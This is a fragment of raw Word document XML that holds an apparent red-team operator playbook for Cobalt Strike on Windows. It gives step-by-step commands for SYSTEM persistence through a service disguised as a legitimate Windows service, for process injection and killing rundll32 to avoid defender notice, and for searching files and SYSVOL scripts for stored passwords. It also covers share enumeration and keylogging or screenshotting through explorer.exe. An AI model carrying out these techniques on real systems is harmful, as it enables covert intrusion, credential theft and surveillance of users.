        <w:contextualSpacing w:val="0"/>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100">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Do not put a beacon in a JUNCTION folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fgv5lpo10mg9" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>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There are several ways to accomplish SYSTEM persistence: creating a service, scheduling a task…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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104">
      <w:pPr>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Creating a Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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106">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose a service name that is used by windows but is not currently on the system you are attacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a SYSTEM level beacon and rename the beacon to match the binary associated with the service selected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the service binary to c:\windows\system32.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the service:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sc create &lt;servicename&gt; binpath= “&lt;path\to\binary&gt;” DisplayName=  “&lt;displayname&gt;” start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide a description preferably the same description that Windows uses to describe the service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sc description &lt;servicename&gt; “&lt;description&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sc start &lt;servicename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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10F">
      <w:pPr>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After the service runs, it will create a process called rundll32.exe. This process can be tip-off for defenders. Once the beacon calls back, run a Windows service executable in c:\windows\system32 that is not currently running (suggest upnpcont.exe) and inject into that process while killing the rundll32 process. This process can be accomplished with the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd /c &lt;c:\path\to\binary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inject &lt;PID&gt; &lt;x86|x64&gt; &lt;listener&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kill rundll32.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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116">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">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18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h1lawc50fc23" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Positioning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>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Before an escalation of privileges can occur, certain data must be collected to find out the avenues available for escalation. This information gathering process is different from SA because the intent to to find a vulnerability or a piece of information to enable an escalation of authority.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3uf1dwxmw28u" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Mining</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>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Look for files that may contain passwords or script files in which an admin may have left credentials so a service might run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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11D">
      <w:pPr>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Document file types may include: *.txt, *.doc, *.docx, *.xls, *.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>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Script file types may include: *.bat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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120">
      <w:pPr>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On the domain controller search for scripts here: \\&lt;IP&gt;\SYSVOL\scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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122">
      <w:pPr>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Besides searching local files, remember to search public shares as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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124">
      <w:pPr>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dir /a </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays both hidden and normal files in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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a folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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127">
      <w:pPr>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dir /a /s *&lt;PieceOfFilename&gt;*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Displays hidden files and searches every </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>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subdirectory within the current path for a file that has &lt;PieceOfFilename&gt; in its own name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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12A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Helpful directories to search include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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12C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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c:\users\Public</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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c:\users\&lt;username&gt;\Desktop | Documents | Downloads | Recent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qf4gfn4d1y2i" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; Local Queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>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Enumerate shares, user information, and group information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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132">
      <w:pPr>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net use</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays mapped drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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134">
      <w:pPr>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net share</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Displays shared drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k79fmhrdy8yx" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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keylogger &lt;PID&gt; &lt;x86|x64&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS utility for keylogging. Default </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>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architecture is x86. Best to use the PID for explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p126a0buolwp" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>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screenshot &lt;PID&gt; &lt;x86|x64&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Screenshot the workstation. Easiest to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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inject into explorer.exe. Defaults to x86.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
